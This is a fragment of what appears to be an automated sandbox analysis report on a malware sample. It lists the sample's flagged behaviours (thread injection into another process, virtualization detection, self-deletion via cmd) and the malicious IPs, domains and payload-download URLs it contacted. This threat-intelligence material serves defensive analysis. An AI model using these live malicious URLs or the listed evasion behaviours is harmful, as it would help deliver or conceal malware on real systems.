Performs DNS queries to domains with low reputation 17->44 21 cmmon32.exe 17->21         started        signatures10 process11 signatures12 46 Self deletion via cmd delete 21->46 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.82.177.176
 blumeconstructionllc.com Netherlands
204601 ON-LINE-DATAServerlocation-NetherlandsDrontenNL true
172.67.161.80
 www.lrbounee.xyz United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
www.lrbounee.xyz 172.67.161.80 true
blumeconstructionllc.com 45.82.177.176 true
www.etr6safvu8.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://blumeconstructionllc.com/bin_NX true
  • Avira URL Cloud: safe
 unknown
www.lrbounee.xyz/kb8y/ true
  • Avira URL Cloud: safe
 low
https://blumeconstructionllc.com/bin_NXOEaeagUq10.bin false
  • Avira URL Cloud: safe
 unknown